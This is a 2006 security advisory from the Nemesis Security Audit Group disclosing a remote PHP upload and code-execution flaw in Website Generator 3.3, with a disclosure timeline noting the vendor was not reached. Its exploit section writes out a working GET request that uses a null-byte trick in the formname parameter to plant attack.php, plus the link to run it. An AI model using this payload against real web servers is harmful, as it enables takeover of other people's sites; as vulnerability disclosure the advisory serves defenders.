NSA Group Security Advisory NSAG-№202-25.02.2006 Vulnerability WEBSITE GENERATOR 3.3

[NSA Group <vulnerability@xxxxxxx>]

Advisory:
NSAG-№202-25.02.2006

Research:
NSA Group [Russian company on Audit of safety & Network security]

Site of Research:
http://www.nsag.ru or http://www.nsag.org

Product:
WEBSITE GENERATOR 3.3


Site of manufacturer:
http://freehostshop.com

The status: 
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is not notified (there is no communication).
17/02/2006 - Publication of vulnerability.

Original Advisory:
http://www.nsag.ru/vuln/894.html

Risk: 
Hide

Description: 
The removed user, can upload php script from other server and execute
custom php code on webserver.


Exploit: 
Method GET:
http://example.com/files/myforms/process3.php?formname=attack.php%00*name[0]=
Link:
http://example.com/files/myforms/forms/attack.php

More information:
http://www.nsag.ru/vuln/894.html

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


www.nsag.ru 
«Nemesis» © 2006 
------------------------------------ 
Nemesis Security Audit Group © 2006.